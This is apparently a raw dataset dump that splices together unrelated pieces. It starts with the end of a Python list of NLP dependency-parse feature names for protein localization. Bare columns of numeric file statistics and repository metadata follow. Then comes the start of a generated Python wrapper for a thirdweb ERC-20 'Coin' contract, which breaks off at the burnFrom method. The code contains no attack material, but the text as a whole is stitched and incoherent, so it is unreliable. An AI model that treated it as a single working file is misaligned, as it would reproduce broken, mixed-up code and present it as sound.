"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<protein ~~ TARGET]>_[0]", # 150
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ protein ~~ TARGET]>_[0]", # 151
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<modulates>_[0]", # 152
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<find>_[0]", # 153
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<be ~~ protein>_[0]", # 154
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<induce>_[0]", # 155
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<ADP ~~ ADP ~~ TARGET]>_[0]", # 156
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<of ~~ TARGET]>_[0]", # 157
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<dobj ~~ advcl ~~ dobj>_[0]", # 158
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ VERB ~~ ADV>_[0]", # 159
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<be ~~ require>_[0]", # 160
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<e_1 ~~ e_1 ~~ be>_[0]", # 161
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ require ~~ for>_[0]", # 162
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<have ~~ TARGET]>_[0]", # 163
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<bipolarize>_[0]", # 164
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<e_2 ~~ and ~~ TARGET]>_[0]", # 165
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ CONJ ~~ TARGET]>_[0]", # 166
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<implicate>_[0]", # 167
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<regulation ~~ of>_[0]", # 168
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ , ~~ which>_[0]", # 169
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<of ~~ e_1>_[0]", # 170
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<of ~~ e_1 ~~ e_1>_[0]", # 171
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<use>_[0]", # 172
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<ccomp ~~ nsubjpass>_[0]", # 173
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<dobj ~~ pcomp>_[0]", # 174
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<but>_[0]", # 175
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<mediate>_[0]", # 176
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<compound ~~ prep>_[0]", # 177
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<of ~~ ubiquitination ~~ at>_[0]", # 178
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NUM ~~ NOUN ~~ ADP>_[0]", # 179
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<within>_[0]", # 180
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ from>_[0]", # 181
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<into ~~ TARGET]>_[0]", # 182
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<be ~~ the>_[0]", # 183
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<import ~~ into>_[0]", # 184
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<dobj ~~ conj>_[0]", # 185
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<this>_[0]", # 186
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<effect ~~ on>_[0]", # 187
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ locate>_[0]", # 188
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<, ~~ such ~~ as>_[0]", # 189
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<receptor>_[0]", # 190
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<dobj ~~ nmod>_[0]", # 191
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<ccomp ~~ nsubj>_[0]", # 192
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<be ~~ associate>_[0]", # 193
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<acomp ~~ npadvmod>_[0]", # 194
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<be ~~ dispensable>_[0]", # 195
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ VERB ~~ ADJ>_[0]", # 196
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_1 ~~ to>_[0]", # 197
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<show>_[0]", # 198
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ e_1 ~~ TARGET]>_[0]", # 199
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<VERB ~~ ADJ ~~ TARGET]>_[0]", # 200
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<segment>_[0]", # 201
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ segment>_[0]", # 202
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<segment ~~ in>_[0]", # 203
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ segment ~~ in>_[0]", # 204
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<segment ~~ in ~~ TARGET]>_[0]", # 205
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<segment>_[0]", # 206
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ segment>_[0]", # 207
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<segment ~~ in>_[0]", # 208
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ segment ~~ in>_[0]", # 209
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<segment ~~ in ~~ TARGET]>_[0]", # 210
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<, ~~ to>_[0]", # 211
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ ADV ~~ NUM>_[0]", # 212
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<block>_[0]", # 213
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<in ~~ cis>_[0]", # 214
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<domain ~~ TARGET]>_[0]", # 215
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<translocation>_[0]", # 216
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<compound ~~ nsubjpass>_[0]", # 217
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ at ~~ TARGET]>_[0]", # 218
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_2 ~~ TARGET]>_[0]", # 219
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<important ~~ for ~~ TARGET]>_[0]", # 220
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<for ~~ function ~~ TARGET]>_[0]", # 221
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<prep ~~ pobj ~~ nsubj>_[0]", # 222
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<conversely>_[0]", # 223
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<function ~~ and ~~ ,>_[0]", # 224
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<and ~~ , ~~ conversely>_[0]", # 225
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<morphology>_[0]", # 226
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<gfp>_[0]", # 227
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ localization ~~ at>_[0]", # 228
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<cohesin>_[0]", # 229
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<vesicle>_[0]", # 230
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<vesicle>_[0]", # 231
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ vesicle>_[0]", # 232
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<be ~~ significantly>_[0]", # 233
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ at ~~ have>_[0]", # 234
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ domain ~~ of>_[0]", # 235
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ domain ~~ of>_[0]", # 236
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<domain ~~ (>_[0]", # 237
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ domain ~~ (>_[0]", # 238
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<domain ~~ ( ~~ TARGET]>_[0]", # 239
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<- ~~ mediate>_[0]", # 240
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ proliferation>_[0]", # 241
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ - ~~ mediate>_[0]", # 242
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ proliferation ~~ TARGET]>_[0]", # 243
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<nmod ~~ compound>_[0]", # 244
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<expression ~~ induce ~~ promote>_[0]", # 245
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<abundance ~~ TARGET]>_[0]", # 246
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ PART ~~ VERB>_[0]", # 247
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<eliminate ~~ from ~~ TARGET]>_[0]", # 248
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<- ~~ activate ~~ TARGET]>_[0]", # 249
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<VERB ~~ PROPN ~~ NOUN>_[0]", # 250
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<compound ~~ compound ~~ amod>_[0]", # 251
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<appos ~~ nsubj ~~ dobj>_[0]", # 252
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<that ~~ u>_[0]", # 253
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<protein ~~ localize ~~ to>_[0]", # 254
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<nmod ~~ nsubj ~~ prep>_[0]", # 255
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ locate>_[0]", # 256
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ locate ~~ in>_[0]", # 257
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<designate>_[0]", # 258
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<gtpase>_[0]", # 259
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ to ~~ mediate>_[0]", # 260
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ - ~~ dependent>_[0]", # 261
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ constriction>_[0]", # 262
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ constriction ~~ TARGET]>_[0]", # 263
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<effect>_[0]", # 264
"IsSpecificProteinType::41_is_enzyme_[0]", # 265
"LocalizationRelationsRatios::50_corpus_unnormalized_total_background_loc_rels_ratios_[0]", # 266
"LocalizationRelationsRatios::58_SwissProt_normalized_exists_relation_[0]", # 267
]
| 85.944649
| 111
| 0.736379
| 3,284
| 23,291
| 4.553593
| 0.122412
| 0.087936
| 0.072556
| 0.198609
| 0.809282
| 0.801324
| 0.801324
| 0.800388
| 0.537181
| 0.181156
| 0
| 0.087338
| 0.118071
| 23,291
| 270
| 112
| 86.262963
| 0.64067
| 0.041261
| 0
| 0
| 0
| 0
| 0.878337
| 0.714247
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.011111
| 0.007407
| 0
| 0.007407
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
84f8001f4df51bf70b69cb7ca918fb51c5fd6c68
| 116,152
|
py
|
Python
|
thirdweb/abi/coin/__init__.py
|
princetonwong/python-sdk
|
f35181d97620e29d055498fca75f3702f3bb2449
|
[
"Apache-2.0"
] | 1
|
2022-02-18T16:59:12.000Z
|
2022-02-18T16:59:12.000Z
|
thirdweb/abi/coin/__init__.py
|
princetonwong/python-sdk
|
f35181d97620e29d055498fca75f3702f3bb2449
|
[
"Apache-2.0"
] | null | null | null |
thirdweb/abi/coin/__init__.py
|
princetonwong/python-sdk
|
f35181d97620e29d055498fca75f3702f3bb2449
|
[
"Apache-2.0"
] | null | null | null |
"""Generated wrapper for Coin Solidity contract."""
# pylint: disable=too-many-arguments
import json
from typing import ( # pylint: disable=unused-import
Any,
List,
Optional,
Tuple,
Union,
)
from eth_utils import to_checksum_address
from mypy_extensions import TypedDict # pylint: disable=unused-import
from hexbytes import HexBytes
from thirdweb_web3 import Web3
from thirdweb_web3.contract import ContractFunction
from thirdweb_web3.datastructures import AttributeDict
from thirdweb_web3.providers.base import BaseProvider
from zero_ex.contract_wrappers.bases import ContractMethod, Validator
from zero_ex.contract_wrappers.tx_params import TxParams
# Try to import a custom validator class definition; if there isn't one,
# declare one that we can instantiate for the default argument to the
# constructor for Coin below.
try:
# both mypy and pylint complain about what we're doing here, but this
# works just fine, so their messages have been disabled here.
from . import ( # type: ignore # pylint: disable=import-self
CoinValidator,
)
except ImportError:
class CoinValidator( # type: ignore
Validator
):
"""No-op input validator."""
try:
from .middleware import MIDDLEWARE # type: ignore
except ImportError:
pass
class DefaultAdminRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the DEFAULT_ADMIN_ROLE method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class DomainSeparatorMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the DOMAIN_SEPARATOR method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class MinterRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the MINTER_ROLE method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class PauserRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the PAUSER_ROLE method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class TransferRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the TRANSFER_ROLE method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class ContractUri_Method(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the _contractURI method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class AllowanceMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the allowance method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, owner: str, spender: str):
"""Validate the inputs to the allowance method."""
self.validator.assert_valid(
method_name='allowance',
parameter_name='owner',
argument_value=owner,
)
owner = self.validate_and_checksum_address(owner)
self.validator.assert_valid(
method_name='allowance',
parameter_name='spender',
argument_value=spender,
)
spender = self.validate_and_checksum_address(spender)
return (owner, spender)
def call(self, owner: str, spender: str, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(owner, spender) = self.validate_and_normalize_inputs(owner, spender)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(
owner, spender).call(tx_params.as_dict())
return int(returned)
def send_transaction(self, owner: str, spender: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(owner, spender) = self.validate_and_normalize_inputs(owner, spender)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner, spender).transact(tx_params.as_dict())
def build_transaction(self, owner: str, spender: str, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(owner, spender) = self.validate_and_normalize_inputs(owner, spender)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner, spender).buildTransaction(tx_params.as_dict())
def estimate_gas(self, owner: str, spender: str, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(owner, spender) = self.validate_and_normalize_inputs(owner, spender)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner, spender).estimateGas(tx_params.as_dict())
class ApproveMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the approve method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, spender: str, amount: int):
"""Validate the inputs to the approve method."""
self.validator.assert_valid(
method_name='approve',
parameter_name='spender',
argument_value=spender,
)
spender = self.validate_and_checksum_address(spender)
self.validator.assert_valid(
method_name='approve',
parameter_name='amount',
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (spender, amount)
def call(self, spender: str, amount: int, tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(spender, amount) = self.validate_and_normalize_inputs(spender, amount)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(
spender, amount).call(tx_params.as_dict())
return bool(returned)
def send_transaction(self, spender: str, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(spender, amount) = self.validate_and_normalize_inputs(spender, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, amount).transact(tx_params.as_dict())
def build_transaction(self, spender: str, amount: int, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(spender, amount) = self.validate_and_normalize_inputs(spender, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, amount).buildTransaction(tx_params.as_dict())
def estimate_gas(self, spender: str, amount: int, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(spender, amount) = self.validate_and_normalize_inputs(spender, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, amount).estimateGas(tx_params.as_dict())
class BalanceOfMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the balanceOf method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str):
"""Validate the inputs to the balanceOf method."""
self.validator.assert_valid(
method_name='balanceOf',
parameter_name='account',
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (account)
def call(self, account: str, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(account).call(tx_params.as_dict())
return int(returned)
def send_transaction(self, account: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).transact(tx_params.as_dict())
def build_transaction(self, account: str, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).buildTransaction(tx_params.as_dict())
def estimate_gas(self, account: str, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).estimateGas(tx_params.as_dict())
class BurnMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the burn method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, amount: int):
"""Validate the inputs to the burn method."""
self.validator.assert_valid(
method_name='burn',
parameter_name='amount',
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (amount)
def call(self, amount: int, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(amount) = self.validate_and_normalize_inputs(amount)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(amount).call(tx_params.as_dict())
def send_transaction(self, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(amount) = self.validate_and_normalize_inputs(amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(amount).transact(tx_params.as_dict())
def build_transaction(self, amount: int, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(amount) = self.validate_and_normalize_inputs(amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(amount).buildTransaction(tx_params.as_dict())
def estimate_gas(self, amount: int, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(amount) = self.validate_and_normalize_inputs(amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(amount).estimateGas(tx_params.as_dict())
class BurnFromMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the burnFrom method."""
